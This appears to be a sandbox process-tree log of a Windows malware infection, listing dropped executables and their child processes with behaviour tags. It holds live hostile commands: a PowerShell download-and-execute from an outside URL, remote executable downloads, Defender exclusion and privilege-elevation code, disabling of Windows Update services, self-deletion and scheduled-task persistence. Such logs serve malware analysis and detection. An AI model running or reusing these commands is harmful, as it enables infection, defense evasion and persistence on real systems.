C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i6⤵
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\amert.exeC:\Users\Admin\AppData\Local\Temp\Files\amert.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exeC:\Users\Admin\AppData\Local\Temp\Files\ama.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXE4⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\SysWOW64\notepad.exe"5⤵
-
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"6⤵
-
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"6⤵
-
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 6807⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\big.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\big.exeC:\Users\Admin\AppData\Local\Temp\Files\big.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exeC:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exeC:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exeC:\Users\Admin\AppData\Local\Temp\Files\dusers.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "5⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\Users.exeusers.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "7⤵
-
C:\Windows\SysWOW64\chcp.comCHCP 12518⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 18⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/app.exe8⤵
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe8⤵
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 68⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\Macromedia6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\native.exeC:\Users\Admin\AppData\Local\Temp\Files\native.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\native.exeC:\Users\Admin\AppData\Local\Temp\Files\native.exe5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\setup.exeC:\Users\Admin\AppData\Local\Temp\Files\setup.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1BZ7KF~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\1BZ7KF~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\1BZ7KF~1.EXE4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\USA123.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\USA123.exeC:\Users\Admin\AppData\Local\Temp\Files\USA123.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXE4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 7726⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\net.exeC:\Users\Admin\AppData\Local\Temp\Files\net.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 8325⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exeC:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 8005⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\GLOBAL~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\GLOBAL~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\GLOBAL~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exeC:\Users\Admin\AppData\Local\Temp\Files\cp.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\Windows.exeC:\Users\Admin\AppData\Local\Temp\Files\Windows.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXEC:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE4⤵
-
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 2886⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\RETAIL~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\RETAIL~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\RETAIL~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exeC:\Users\Admin\AppData\Local\Temp\Files\ma.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~2.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~2.EXEC:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~2.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\file.exeC:\Users\Admin\AppData\Local\Temp\Files\file.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /42⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /42⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:31⤵
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }3⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1836 -ip 18361⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\221bb46144654a1cbdfff2d3af32a647 /t 3436 /p 32401⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /42⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\taskmgr.exeC:\Windows\system32\taskmgr.exe /43⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\taskmgr.exeC:\Windows\system32\taskmgr.exe /43⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Chrome\CNSWA.exeC:\ProgramData\Chrome\CNSWA.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe3⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=3740 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=3792 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4948 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5880 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=968 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=2132 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 416 -ip 4161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 4680 -ip 46801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 944 -p 5600 -ip 56001⤵
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\46baf9da840e4e3a91a92eaf89d6d820 /t 6320 /p 63161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 6056 -ip 60561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 3212 -ip 32121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 3208 -ip 32081⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exeC:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe1⤵
-
